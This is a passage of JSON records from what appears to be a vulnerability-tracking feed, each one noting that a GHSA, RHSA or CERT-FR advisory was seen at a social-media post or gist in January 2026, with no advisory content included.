"2026-01-24T22:31:51.000000Z"}, {"uuid": "c3ed9baf-7fd3-4323-85c0-66c794f7b772", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6475-r3vj-m8vf", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mbyh5ow3hu27", "content": "", "creation_timestamp": "2026-01-09T12:01:00.296828Z"}, {"uuid": "d9a6464c-957a-49d8-ad44-262c8ba0a942", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmc4-9828-r48r", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3mbyjkl6o6b2c", "content": "", "creation_timestamp": "2026-01-09T12:43:59.739257Z"}, {"uuid": "93571a09-7292-45ad-9375-8bccd7161133", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0545", "type": "seen", "source": "https://gist.github.com/Darkcrai86/39860f074c61921b1c15c2fc2fef432d", "content": "", "creation_timestamp": "2026-01-14T10:22:35.000000Z"}, {"uuid": "c725a237-fb79-4f91-b3a7-254e818be101", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58pv-8j8x-9vj2", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mcezicraxy2m", "content": "", "creation_timestamp": "2026-01-14T12:01:00.537822Z"}, {"uuid": "a2a3f0d6-f962-4589-a782-f9ee7bcb424d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-67mh-4wv8-2f99", "type": "seen", "source": "https://gist.github.com/konard/dea39ba8c74389a73a3271e6639c7efe", "content": "", "creation_timestamp": "2026-01-14T14:17:45.000000Z"}, {"uuid": "4b27667e-74cc-4905-aa2a-76e461e9808c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm45-q3v2-6cf8", "type": "seen", "source": "https://gist.github.com/konard/dea39ba8c74389a73a3271e6639c7efe", "content": "", "creation_timestamp": "2026-01-14T14:17:45.000000Z"}, {"uuid": "85f2b85e-87bd-47a5-856f-6efdc54c3312", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7qm7-455j-5p63", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115893885659000387", "content": "", "creation_timestamp": "2026-01-14T14:19:15.449562Z"}, {"uuid": "b3e868ef-7023-4bcb-8f38-18693d252c98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0576", "type": "seen", "source": "https://gist.github.com/Darkcrai86/97d0a75dfa445a3baa7b09cead5da904", "content": "", "creation_timestamp": "2026-01-14T16:15:00.000000Z"}, {"uuid": "ab81afc5-bda8-4020-a083-d469b9704b53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3g2f-4rjg-9385", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115894579878017350", "content": "", "creation_timestamp": "2026-01-14T17:15:48.412953Z"}, {"uuid": "6d52771f-84c7-4d67-a6f4-b0923d456edc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c944-cv5f-hpvr", "type": "seen", "source": "https://github.blog/security/community-powered-security-with-ai-an-open-source-framework-for-security-research/", "content": "", "creation_timestamp": "2026-01-14T17:45:09.000000Z"}, {"uuid": "9d599bc0-7fd0-4a77-8771-2b94fe7b3478", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0643", "type": "seen", "source": "https://gist.github.com/Darkcrai86/fa37b7f1746c5dd902974fd57b79c4ea", "content": "", "creation_timestamp": "2026-01-15T07:56:59.000000Z"}, {"uuid": "bae2abd5-e7fc-428e-9ff1-2ed2603ec6a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0668", "type": "seen", "source": "https://gist.github.com/Darkcrai86/e9fa822275600dd920a33a2f790561bf", "content": "", "creation_timestamp": "2026-01-15T09:26:33.000000Z"}, {"uuid": "2d9f838a-1a9f-44a8-aadd-c165260bafa9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73rr-hh4g-fpgx", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mchjx2qz4s2a", "content": "", "creation_timestamp": "2026-01-15T12:00:54.862257Z"}, {"uuid": "f14a75ca-c28a-40f3-adda-c906e6b262e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7hg4-x4pr-3hrg", "type": "seen", "source": "https://bsky.app/profile/blackhatnews.tokyo/post/3mchjxkdx3t2o", "content": "", "creation_timestamp": "2026-01-15T12:01:11.060488Z"}, {"uuid": "548b2bf6-bd42-4409-818c-828513d8ab69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8g4q-xg66-9fp4", "type": "seen", "source": "https://gist.github.com/konard/fa7ee493e411fb1a0905d8547f764ea2", "content": "", "creation_timestamp": "2026-01-21T10:39:09.000000Z"}, {"uuid": "156ca641-911b-4013-a89c-4746a95d064a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hh2w-p6rv-4g7w", "type": "seen", "source": "https://gist.github.com/konard/fa7ee493e411fb1a0905d8547f764ea2", "content": "", "creation_timestamp": "2026-01-21T10:39:09.000000Z"}, {"uuid": "bfa30835-fb0b-49cd-b71e-bc020afac505", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0922", "type": "seen", "source": "https://gist.github.com/Darkcrai86/ff76134d954f53898f171bc3f59cdcbc", "content": "", "creation_timestamp": "2026-01-21T10:49:53.000000Z"}, {"uuid": "cf194fc4-3fe1-4ef5-85f7-88415176102f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0908", "type": "seen", "source": "https://gist.github.com/Darkcrai86/bd1bd474c2a7bee86ae9d2588651e7b3", "content": "", "creation_timestamp": "2026-01-21T10:51:10.000000Z"}, {"uuid": "21324348-819f-47e0-b4ac-ad4b3afd9a3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0911", "type": "seen", "source": "https://gist.github.com/Darkcrai86/af92ece7d0cf270562236a3cbaef9652", "content": "", "creation_timestamp": "2026-01-21T10:50:44.000000Z"}, {"uuid": "62f8307d-79e3-4172-9afe-cab2b5b17951", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0914", "type": "seen", "source": "https://gist.github.com/Darkcrai86/57edac8a3e782a0c4679ce47e4982376", "content": "", "creation_timestamp": "2026-01-21T10:50:21.000000Z"}, {"uuid": "70b35e5f-2947-4d0e-af87-c836ae0ee54c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0909", "type": "seen", "source": "https://gist.github.com/Darkcrai86/c23e9e88d056bfecd803f626fc5b8c31", "content": "", "creation_timestamp": "2026-01-21T10:51:57.000000Z"}, {"uuid": "1ea55686-7663-4f0c-b51f-ab012e13d185", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0924", "type": "seen", "source": "https://gist.github.com/Darkcrai86/72a1ea510779574affd676079a7cc6ee", "content": "", "creation_timestamp": "2026-01-21T12:18:18.000000Z"}, {"uuid": "e8ce1b90-304e-4c50-975c-9aeae1293703", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2026-ACT-003", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115934035856124849", "content": "", "creation_timestamp": "2026-01-21T16:30:00.971047Z"}, {"uuid": "426eb50a-761d-4c19-8d36-561e0d9545de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-232v-j27c-5pp6", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115935997438542873", "content": "", "creation_timestamp": "2026-01-22T00:48:52.753184Z"}, {"uuid": "3d087d98-2fd5-43c3-8d8f-864e4671bc2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-232v-j27c-5pp6", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115936006347966952", "content": "", "creation_timestamp": "2026-01-22T00:51:09.891466Z"}, {"uuid": "a582f516-d7f6-4f24-a271-fff310f5e7eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0848", "type": "seen", "source": "https://gist.github.com/Darkcrai86/6eb7dbf32a11f3690e3a8d66572778ba", "content": "", "creation_timestamp": "2026-01-22T08:59:00.000000Z"}, {"uuid": "2f4dd961-354f-4bd0-9a76-86470473fe3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0935", "type": "seen", "source": "https://gist.github.com/Darkcrai86/c86d37dd69863dff2516741f9c8f1210", "content": "", "creation_timestamp": "2026-01-22T08:58:18.000000Z"}, {"uuid": "07cd307d-7d91-44bf-ad5b-e6ccf0f7a36e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0974", "type": "seen", "source": "https://gist.github.com/Darkcrai86/91904f1497378d8f4c05e7e40796c86f", "content": "", "creation_timestamp": "2026-01-22T08:57:42.000000Z"}, {"uuid": "2cb5dfbb-560b-45c7-8a92-c33565bffbfa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0923", "type": "seen", "source": "https://gist.github.com/Darkcrai86/7d3c8109608e334271e28c43e9d6f71b", "content": "", "creation_timestamp": "2026-01-22T08:59:55.000000Z"}, {"uuid": "b72cfd2a-1979-4973-9af5-7c0367bbe77a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0925", "type": "seen", "source": "https://gist.github.com/Darkcrai86/14ab35bf6e03467b974965e1fea8eb8b", "content": "", "creation_timestamp": "2026-01-22T08:59:35.000000Z"}, {"uuid": "67d168ab-1dca-421a-a33d-0a09c344a71c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0921", "type": "seen", "source": "https://gist.github.com/Darkcrai86/004130e69a7f79dbb17e64eee5463c5c", "content": "", "creation_timestamp": "2026-01-22T09:00:45.000000Z"}, {"uuid": "928c9ef9-e2e9-41b4-a6ee-3f3182568181", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0927", "type": "seen", "source": "https://gist.github.com/Darkcrai86/1999e587e45626d2b4bbd4cacfc43afa", "content": "", "creation_timestamp": "2026-01-22T10:22:27.000000Z"}, {"uuid": "78b0d007-b018-4ef8-a461-b97fc3b979af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58pv-8j8x-9vj2", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mcz57qijy72v", "content": "", "creation_timestamp": "2026-01-22T12:01:04.128452Z"}, {"uuid": "c64afc2b-2114-4410-bbbf-01b25288ec6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73rr-hh4g-fpgx", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mcz57rdbp72u", "content": "", "creation_timestamp": "2026-01-22T12:01:04.619884Z"}, {"uuid": "3b3f2ba4-a193-40d6-8f24-3aae93596798", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qp54-6gfq-3gff", "type": "seen", "source": "https://gist.github.com/frustratedProton/75f702b4646f63058080b9d2c13f7d40", "content": "", "creation_timestamp": "2026-01-24T05:45:07.000000Z"}, {"uuid": "5442f743-425c-44c2-8f0f-08b3824ccf42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hx9q-6w63-j58v", "type": "seen", "source": "https://gist.github.com/alon710/cee85c1be84448547c73b283504cccd4", "content": "", "creation_timestamp": "2026-01-24T21:22:38.000000Z"}, {"uuid": "ef2981d5-3437-493a-b645-e7389eb4253b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f456-rf33-4626", "type": "seen", "source": "https://gist.github.com/alon710/3d0a1b584a84dc43d2a9a61a3821c3c4", "content": "", "creation_timestamp": "2026-01-24T21:22:37.000000Z"}, {"uuid": "95a34373-3a06-4011-b6f3-8f90aa4557cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3jqf-v4mv-747g", "type": "seen", "source": "https://gist.github.com/alon710/f609208050bd49fa817ac02942945a92", "content": "", "creation_timestamp": "2026-01-24T21:22:35.000000Z"}, {"uuid": "2785d06c-a43c-4eb0-b851-29a9a2dc57df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3V2X-9XCV-2V2V", "type": "seen", "source": "https://gist.github.com/alon710/5ca59fe125b164ab27e4ba81bb4e0bc9", "content": "", "creation_timestamp": "2026-01-24T21:22:34.000000Z"}, {"uuid": "ba14f966-6dfe-4a47-a9b6-d8d4930d1c4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7JXJ-RPX7-PH2C", "type": "seen", "source": "https://gist.github.com/alon710/be5bed867a7a74a3502ab74ecb972384", "content": "", "creation_timestamp": "2026-01-24T21:22:33.000000Z"}, {"uuid": "010aa2e5-20d0-483d-a523-bc4c358ae03b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j8hf-cp34-g4j7", "type": "seen", "source": "https://gist.github.com/alon710/abff48b2f8d201cbbe94fbb821268f85", "content": "", "creation_timestamp": "2026-01-24T21:22:32.000000Z"}, {"uuid": "ba86bf43-79b3-491a-852a-be1415b8b8af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8rrh-rw8j-w5fx", "type": "seen", "source": "https://gist.github.com/alon710/086826e3b5292e0abedd51f088e30205", "content": "", "creation_timestamp": "2026-01-24T21:22:31.000000Z"}, {"uuid": "3e4888c7-4633-4d03-b1fa-8e087ecafe1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vqxf-v2gg-x3hc", "type": "seen", "source": "https://gist.github.com/alon710/553f80036420883648a8e05762aa083e", "content": "", "creation_timestamp": "2026-01-24T21:22:30.000000Z"}, {"uuid": "25f266ab-9380-4e54-bc3e-6bb21e2f3a85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3j22-8qj3-26mx", "type": "seen", "source": "https://gist.github.com/alon710/c7f450c2bc28d71462bc12de55993010", "content": "", "creation_timestamp": "2026-01-24T21:22:29.000000Z"}, {"uuid": "7e79302f-3394-4de3-9022-8e5dbb64527c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xc5-wfwc-jw47", "type": "seen", "source": "https://gist.github.com/alon710/8f142f8cf4ae5a8648d9ce5ea421de58", "content": "", "creation_timestamp": "2026-01-24T21:22:28.000000Z"}, {"uuid": "9c0c99ff-eeae-41e5-bd0f-eddf74ae3791", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qqpg-mvqg-649v", "type": "seen", "source": "https://gist.github.com/alon710/8137a6322f794487d7ca1b10df5feb42", "content": "", "creation_timestamp": "2026-01-24T21:22:27.000000Z"}, {"uuid": "21e37df2-9cb6-4146-82f5-02fefbc3e2e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C32P-WCQJ-J677", "type": "seen", "source": "https://gist.github.com/alon710/09cf8d01d7e6cb6a622cbf15df22ae89", "content": "", "creation_timestamp": "2026-01-24T21:22:24.000000Z"}, {"uuid": "d9bcce7a-26bf-445e-9d0d-9db8f1913003", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j4rc-96xj-gvqc", "type": "seen", "source": "https://gist.github.com/alon710/ca964461aed5244e010c59a03fa6ab1a", "content": "", "creation_timestamp": "2026-01-24T21:22:22.000000Z"}, {"uuid": "1dc6338a-d28b-4968-9201-f9adef6b616b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wm8h-26fv-mg7g", "type": "seen", "source": "https://gist.github.com/alon710/280a53f6f2d65fc97e55b7753d13e7b1", "content": "", "creation_timestamp": "2026-01-24T21:22:20.000000Z"}, {"uuid": "5b3fe6ab-13a4-4eaa-9a55-7472f79c713f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7p9h-m7m8-vhhv", "type": "seen", "source": "https://gist.github.com/alon710/356930af4ab912832ea94f852127f2ea", "content": "", "creation_timestamp": "2026-01-24T21:22:19.000000Z"}, {"uuid": "e7f4db42-4d7c-481f-a42b-7c12238b2753", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w7rq-fgx4-4xcm", "type": "seen", "source": "https://gist.github.com/alon710/77a6fadcdbd2fb538108ea006d83f792", "content": "", "creation_timestamp": "2026-01-24T21:22:18.000000Z"}, {"uuid": "e6b21bf8-4391-4ae5-a3c1-50271e47c337", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mxc8-4jqf-368q", "type": "seen", "source": "https://gist.github.com/alon710/538f3bbaec01e73a79181c8d943a0a8b", "content": "", "creation_timestamp": "2026-01-24T21:22:17.000000Z"}, {"uuid": "789c2aff-ee90-4cd6-ac7f-5ca6d157f560", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xvmh-25jw-gmmm", "type": "seen", "source": "https://gist.github.com/alon710/b66f472b81e7bdba29ecc1785ea0bb4f", "content": "", "creation_timestamp": "2026-01-24T21:22:16.000000Z"}, {"uuid": "a8c9e446-92ed-4512-8d4f-02a951f3a4b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jrpc-w85r-hgqx", "type": "seen", "source": "https://gist.github.com/alon710/ae468b15fdd82ad5a6ec81973cecdb91", "content": "", "creation_timestamp": "2026-01-24T21:22:15.000000Z"}, {"uuid": "21858b30-55f5-42ad-8187-0ae4a6a6fc4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vfmv-f93v-37mw", "type": "seen", "source": "https://gist.github.com/alon710/cc94624c9ce09025cc909ff697f1a74b", "content": "", "creation_timestamp": "2026-01-24T21:22:14.000000Z"}, {"uuid": "53eac336-3edd-4af1-ab15-0c7be9566f26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jr6h-pwwp-c8g6", "type": "seen", "source": "https://gist.github.com/alon710/3964b00bf082e82780fa93c032dab43f", "content": "", "creation_timestamp": "2026-01-24T21:22:13.000000Z"}, {"uuid": "f8c21bb9-ac1f-49d7-a8ba-a2009b78a9df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-393c-qgvj-3xph", "type": "seen", "source": "https://gist.github.com/alon710/fd7a8ba187046b7eeda01ae43554e2fd", "content": "", "creation_timestamp": "2026-01-24T21:22:12.000000Z"}, {"uuid": "22d0a454-8fb0-4854-ac55-0869a2fa8759", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ccq9-c5hv-cf64", "type": "seen", "source": "https://gist.github.com/alon710/c04d0150fe6489cd6aa0244c5949dba1", "content": "", "creation_timestamp": "2026-01-24T21:22:10.000000Z"}, {"uuid": "af23b0a6-0d7b-475b-8db2-7751fe7e0ad2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g54m-9f6g-wj7q", "type": "seen", "source": "https://gist.github.com/alon710/12a87bde6b1571c741d36ec36f95b2c8", "content": "", "creation_timestamp": "2026-01-24T21:22:09.000000Z"}, {"uuid": "bda8407e-d295-4870-9bf5-2afb155bda6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h4fh-pc4w-8w27", "type": "seen", "source": "https://gist.github.com/alon710/79ab585d7925d59f7a9293483cc487f4", "content": "", "creation_timestamp": "2026-01-24T21:22:08.000000Z"}, {"uuid": "0c17766b-4963-4218-8caa-0b692885bc8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-644v-xv3j-xgqg", "type": "seen", "source": "https://gist.github.com/alon710/010a2ce28ba31a738b1c71b60bbd8b59", "content": "", "creation_timestamp": "2026-01-24T21:22:07.000000Z"}, {"uuid": "7be31dc8-d0ad-41ea-8662-acce21a02953", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f4wq-6ww5-m56p", "type": "seen", "source": "https://gist.github.com/alon710/047e9957f2ab58798d9b9678f4c3043a", "content": "", "creation_timestamp": "2026-01-24T21:22:06.000000Z"}, {"uuid": "1bf045b1-26d0-4ed9-91c8-3ae190abd4bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qp59-x883-77qv", "type": "seen", "source": "https://gist.github.com/alon710/d8ecc2355e15c37c35e1743a73f7b7b4", "content": "", "creation_timestamp": "2026-01-24T21:23:32.000000Z"}, {"uuid": "31a31ead-646f-4a22-a378-6742f25124e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v98v-ff95-f3cp", "type": "seen", "source": "https://gist.github.com/alon710/99be91a4caa2116ec10ead0f52b4c71e", "content": "", "creation_timestamp": "2026-01-24T21:23:30.000000Z"}, {"uuid": "c4c44988-04e3-436d-82b4-9950d7e6f1df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9vj4-wc7r-p844", "type": "seen", "source": "https://gist.github.com/alon710/81c73fe4b606f298eee7d18920a81bba", "content": "", "creation_timestamp": "2026-01-24T21:23:29.000000Z"}, {"uuid": "ab2466b9-bdd7-40c7-ad54-6a4ecc474281", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h526-wf6g-67jv", "type": "seen", "source": "https://gist.github.com/alon710/a66372bb9cb505e715583f08653318f8", "content": "", "creation_timestamp": "2026-01-24T21:23:28.000000Z"}, {"uuid": "717ed420-fe4a-4105-bf2c-a6ddb90073ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvpq-2v8x-ww6g", "type": "seen", "source": "https://gist.github.com/alon710/3a34c190ec4954919c2bf1ded12b6cf0", "content": "", "creation_timestamp": "2026-01-24T21:23:26.000000Z"}, {"uuid": "8c2176d0-5fb1-4d41-a168-496f82ff9f4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4h3h-63v6-88qx", "type": "seen", "source": "https://gist.github.com/alon710/b65520804a4a1adc1b23b88734e410cc", "content": "", "creation_timestamp": "2026-01-24T21:23:24.000000Z"}, {"uuid": "9f9b1ca1-61dc-4d92-91a1-ffe2b595dc67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jh7p-qr78-84p7", "type": "seen", "source": "https://gist.github.com/alon710/53ef3cf299982796039e042072a8e56e", "content": "", "creation_timestamp": "2026-01-24T21:23:23.000000Z"}, {"uuid": "12d69ad4-3997-43a3-b9b4-e6e48c5ae349", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pj88-9xww-gxmh", "type": "seen", "source": "https://gist.github.com/alon710/ef2824c2c5f1036a995f9a96abe3f48d", "content": "", "creation_timestamp": "2026-01-24T21:23:22.000000Z"}, {"uuid": "25e86e86-d8e8-40b0-9a5a-d89e43d0e3aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-43mm-m3h2-3prc", "type": "seen", "source": "https://gist.github.com/alon710/7e4b7e1b1b8a9ae2e21b809afbffb9f9", "content": "", 